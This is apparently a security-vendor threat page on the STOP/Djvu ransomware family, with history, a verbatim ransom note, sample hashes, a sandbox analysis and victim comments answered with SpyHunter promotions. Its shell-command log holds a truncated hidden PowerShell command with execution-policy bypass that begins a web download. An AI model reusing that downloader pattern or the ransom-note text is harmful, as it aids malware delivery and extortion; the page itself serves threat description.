STOP Djvu Ransomware

STOP Djvu Ransomware Image

The STOP Ransomware family, also denominated the STOP Djvu Ransomware family, is a threatening piece of malware. The STOP Djvu is just one of the multiple threats that share common characteristics and originate from the STOP ransomware, even though some of their methods to affect file types and encrypt file extensions differ.

The original STOP Ransomware was spotted by security researchers as early as February 2018. However, since then it has evolved, and its family of clones and offshoots has grown. The primary method of distribution of the STOP ransomware was spam email campaigns using corrupted attachments.

The STOP Djvu Ransomware performs in a way similar to other ransomware threats of its kind, encrypting and blocking access to key files users may be utilizing in their system. Personal files, pictures, documents and more can be encrypted and essentially disabled for all users on the machine. STOP Djvu Ransomware was first spotted back in December 2018 in what appeared to be a pretty successful campaign of infection online. Researchers were unaware of the way the ransomware spread, but later victims reported they were discovering infections after they were downloading keygens or cracks. Once the infiltration occurs, STOP Djvu ransomware changes the Windows settings, appending files with a range of names, such as .djvu, .djvus, .djvuu, .uudjvu, .udjvu or .djvuq and the recent .promorad and .promock extensions. The newer versions don't have a decryptor yet, but the older ones can be decrypted using the STOPDecrypter. Users are advised to avoid paying any ransom, no matter what.

The method used to block access to the files uses the RSA encryption algorithm. Although the decryption of the files may seem hard for inexperienced users, there is definitely no need to make any effort to pay the people behind the threat. False promises are usually given in such situations, so users may quickly find out they are ignored once payments were made.

Attacks of the STOP Djvu Ransomware were first reported in late 2018. The main method of distribution for the STOP Djvu remained spam emails and tweaks to the core of the ransomware were relatively minor. The majority of fake, compromised attachments used in the spam emails were macro-enabled office documents or fake PDF files that would run the ransomware without the victim's knowledge. The behavior of the STOP Djvu has not changed much either - the ransomware still deleting all the Shadow Volume snapshots to get rid of backups, then starts encrypting the victim's files.

There are minor changes to the ransom note, which is saved as '_openme.txt' to the victim's desktop. The text of the ransom note can be found here:

’[ransom note start]
———————— ALL YOUR FILES ARE ENCRYPTED ————————

Don't worry, you can return all your files!
All your files documents, photos, databases and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees do we give to you?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information
Don't try to use third-party decrypt tools because it will destroy your files.
Discount 50% available if you contact us first 72 hours.

——————————————————————————————————-

To get this software you need write on our e-mail:
helpshadow@india.com

Reserve e-mail address to contact us:
helpshadow@firemail.cc

Your personal ID: [string]
[ransom note end]’

The ransomware limited itself to renaming the encrypted files with the .djvu extension originally, which was a curious choice because .djvu is actually a legitimate file format developed by the AT&T Labs and used for storing scanned documents, somewhat similar to the Adobe's .pdf. Later versions of the ransomware adopted a series of other extensions for encrypted files, including '.chech,' '.luceq,' '.kroput1,' '.charck,' '.kropun,,' .luces,' '.pulsar1,' '.uudjvu,' '.djvur,’ '.tfude,' '.tfudeq' and '.tfudet'.

The STOP/Djvu Ransomware family is very prolific because cybercriminals have been using its template to create countless, threatening variants. Some of these variants include Aeur Ransomware, Bbii Ransomware, Bbnm Ransomware, Bbzz Ransomware, Bbyy Ransomware, Bnrs Ransomware, Byya Ransomware, Ckae Ransomware, Dmay Ransomware, Dewd Ransomware, Dfwe Ransomware, Eegf Ransomware, Errz Ransomware, Ewdf Ransomware, Fdcv Ransomware, Fefg Ransomware, Gcyi Ransomware, Ghas Ransomware, Hruu Ransomware, Hhjk Ransomware, Ifla Ransomware, Jhbg Ransomware, Jhdd Ransomware, Kxde Ransomware, Kruu Ransomware, Loov Ransomware, Mine Ransomware, Mmob Ransomware, Nnuz Ransomware, Nuhb Ransomware, OOII Ransomware, PPHG Ransomware, Qall Ransomware, Qlnn Ransomware, Rrcc Ransomware, Rrbb Ransomware, Rryy Ransomware, Sijr Ransomware, Tuid Ransomware, Uihj Ransomware, Uyjh Ransomware, Vomm Ransomware, Wnlu Ransomware, Xcbg Ransomware, Ygvb Ransomware, Zfdv Ransomware and Zpps Ransomware.

Certain strains of the STOP Djvu ransomware can be decrypted for free, using the so-called 'STOPDecrypter' that was developed by the security researcher Michael Gillespie and is available online as a free download.

STOP Djvu Ransomware Video

Tip: Turn your sound ON and watch the video in Full Screen mode.

STOP Djvu Ransomware Screenshots

stop djvu ransomware note

Analysis Report

General information

Family Name: STOP/DJVU Ransomware
Signature status: Self Signed

Known Samples

MD5: def8a7bfe5fe47d95a95085d8dbc7a53
SHA1: 7182d4b2f55a560d83edf0824e119f71fa8422b6
SHA256: B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192
File Size: 6.29 MB, 6292105 bytes
MD5: a6b8c0cb178c31dd347554c3e5a0d5f8
SHA1: 91864f269d696ee80869cfeb3c9a204f8031a3bb
SHA256: 4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C
File Size: 3.47 MB, 3471869 bytes
MD5: 2336c9624d9a44c393d354206226f508
SHA1: ea7edc388ad62990f52b9ed40df26d20f4e20190
SHA256: CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0
File Size: 1.36 MB, 1359918 bytes
MD5: 42f32aa699bc45a3638ddeb325ebebc1
SHA1: 508cea3ba2bf04cc6851295f92bf0e752071f6b8
SHA256: 16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4
File Size: 1.33 MB, 1328186 bytes
MD5: 2391d41548b6432191f73edefa273928
SHA1: 620b714f84955aa7fb9a2f2cd528daa1621e18af
SHA256: 4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959
File Size: 3.36 MB, 3357556 bytes
Show More
MD5: 710c3a1beb616d4aa7d5ed9a7f8848e4
SHA1: 326da9ddc0ea840e83f31fbf1f3377a06c911fe5
SHA256: 051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB
File Size: 1.36 MB, 1364106 bytes
MD5: 601b120a6f39f72847b2f581a3d5f158
SHA1: 0cc5781c1cfe6c5d034bd098229773e80e083732
SHA256: BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818
File Size: 4.86 MB, 4858569 bytes
MD5: a7b76a49f289081961f8f3824f0b62ca
SHA1: 6908790199785be7fc6c4eeb1fe426ee1b66cc0b
SHA256: 1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45
File Size: 1.41 MB, 1406899 bytes
MD5: 9f37930d62a1e08f68aa0a72472e7a55
SHA1: 27706b3ff639e5dfa264a823dbe9229cf34ae153
SHA256: 29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F
File Size: 600.12 KB, 600124 bytes
MD5: 7a18839fe61e9cde0e8fea3100acfb2b
SHA1: 9476c97a73e027016e9f6f2f20c2fb19264cd837
SHA256: 0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF
File Size: 316.83 KB, 316832 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File has exports table
  • File has TLS information
  • File is 32-bit executable
  • File is 64-bit executable
  • File is either console or GUI application
Show More
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Name Value
Assembly Version 1.4.1.0
Comments This installation was built with Inno Setup.
Company Name
  • Alexander Roshal
  • TrayToolbar
  • WinTools Software Engineering, Ltd.
File Description
  • Archiwizer WinRAR
  • Gestione archivi WinRAR
  • RAM Saver Professional
  • TrayToolbar
  • WinRAR 5.60 64 Bit Setup
  • WinRAR Installer
File Version
  • 26.2.1
  • 26.0.1
  • 25.7.1
  • 25.4.1
  • 6.20.2
  • 6.2.0
  • 1.4.1.0
  • 1.3.0.0
  • 1.00
Internal Name
  • TJprojMain
  • TrayToolbar.dll
  • WinRAR
Legal Copyright
  • Copyright © Alexander Roshal 1993-2021
  • Copyright © Alexander Roshal 1993-2022
  • Copyright © Alexander Roshal 1993-2025
  • © Brontech, LLC
Original Filename
  • TJprojMain.exe
  • TrayToolbar.dll
  • WinRAR.exe
Product Name
  • Project1
  • RAM Saver 25.4.1 Professional
  • RAM Saver 25.7.1 Professional
  • RAM Saver 26.0.1 Professional
  • RAM Saver 26.2.1 Professional
  • TrayToolbar
  • WinRAR
  • WinRAR 5.60 64 Bit
  • WinRAR Installer
Product Version
  • 26.2.1
  • 26.0.1
  • 25.7.1
  • 25.4.1
  • 6.20.2
  • 6.2.0
  • 5.60
  • 1.4.1+80dec33e25323db7125ddec35b475aa881292801
  • 1.4.0
  • 1.00

Digital Signatures

Signer Root Status
win.rar GmbH DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 Self Signed
win.rar GmbH GlobalSign CodeSigning CA - SHA256 - G3 Hash Mismatch

File Traits

  • .NET
  • 2+ executable sections
  • big overlay
  • HighEntropy
  • Inno
  • InnoSetup Installer
  • Installer Manifest
  • Installer Version
  • MZ (In Overlay)
  • No Version Info
Show More
  • Nullsoft Installer
  • RAR (In Overlay)
  • RARinO
  • Run
  • SusSec
  • vb6
  • WinRAR SFX
  • WRARSFX
  • x64
  • x86

Files Modified

File Attributes
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
Show More
c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\system.dll Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 졷鑂셱ǜ RegNtPreCreateKey

Windows API Usage

Category API
Other Suspicious
  • SetWindowsHookEx
Anti Debug
  • IsDebuggerPresent
  • OutputDebugString
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Process Manipulation Evasion
  • NtUnmapViewOfSection
  • ZwMapViewOfSection
Process Shell Execute
  • CreateProcess
Keyboard Access
  • GetKeyState
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
Show More
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl
  • ntdll.dll!NtUnmapViewOfSection
  • ntdll.dll!NtUnmapViewOfSectionEx
  • ntdll.dll!NtWaitForAlertByThreadId
  • ntdll.dll!NtWaitForMultipleObjects
  • ntdll.dll!NtWaitForSingleObject
  • ntdll.dll!NtWaitForWorkViaWorkerFactory
  • ntdll.dll!NtWaitLowEventPair
  • ntdll.dll!NtWorkerFactoryWorkerReady
  • ntdll.dll!NtWriteFile
  • UNKNOWN
Encryption Used
  • BCryptOpenAlgorithmProvider

Shell Command Execution

"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"
"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"
"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"
"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"
"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"
Show More
powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient

22 Comments

file saya kena virus ransomware ini gimna mengembalikan nya gimna solusi nya

Unfortunately, there is no tool in existence that can decrypt the files. It is best that you first eliminate the STOP Djvu Ransomware using an antimalware resource and then utilize your most recent backup to restore the encrypted files.

my all data infected by .lokf virus
can spyhunter5 remove it
please help me

Yes, SpyHunter can automatically detect and remove the virus/ransomware.

I GOT .PINY VIRUS IN MY FILES ALL FILES HAVE GONE .PINY EXT.

I have been attacked by .igal virus which is from the STOP/DJVU family. please help me!!. I also noticed that my files are encypted with a newer and online key. that makes it difficuilt to decrypt but There MUST some way!! please, IT's only 58GB of data .

BUENAS TARDES.. QUISIERA SABER SI PUEDO RECUPERAR MIS ARCHIVOS CON EXTENSION CABS, NECESITO DESINCRIPTAR ESTE TIPO DE RAMSONWARE

hi
my laptop got affected by nusm ransome can spyhunter able to remove it ? and if yes then how i will get my files back . if you can help me i will buy your software

hola mi equipo fue afectado por el virus con la extension zqqw, quiero saber si su producto puede eliminar el ransomware y deencriptar mis archivos, gracias

my laptop affected .gujd ramsonware..i had fully deleted the virus but my files is encrypted

Rey Eduard Umel Reply

My files are infected just today 07 August 2021 with online password Stop Djvu Ransomware. all files converted to .NOOA files. Please help.

Hi I got this virus of REQG and my each file got encrypted, what should I do now. I am really depressped please guide me

hola mi equipo fue afectado por el virus con la extension ssoi, quiero saber si su producto puede eliminar el ransomware y deencriptar mis archivos, gracias

Yes, SpyHunter can automatically detect and remove the Ransomware threat (STOP/Djvu Ransomware).

Quisiera saber si este programa puede eliminar el ransomware .Tuid y si es posible que pueda recuperar mis archivos?

SpyHunter is able to automatically detect and remove the STOP Djvu Ransomware threat from your computer.

Necesito saber si el Ransomware que cambio la extensión a . GGWQ puede ser eliminado. Gracias

I have been attacked by .btnw virus which is from the STOP/DJVU family. please help me!!.

Hello, I have been attacked by ransomware and my files were left with a .bpto extension, can I recover them?

Recovery of files encrypted by ransomware is difficult. However, you can remove the threat, which is recommended, using a program like SpyHunter. Once it is removed, the encryption process will stop. Then, you may utilize our helpdesk feature to interact with our techs to see if the files may be recovered.

We hope this helps.

Good day,i downloaded spyHunter and removed the viruses on my laptop but how can i decrypt all my files that are encrypted by nuhb and dwsq ransomware,pls help

SpyHunter can remove it automatically. For any files that remain encrypted, you may have to use a backup to restore those files. However, our techs via our SpyHunter Spyware HelpDesk feature can look into your situation and see if there is a solution.

Trending

Most Viewed

Loading...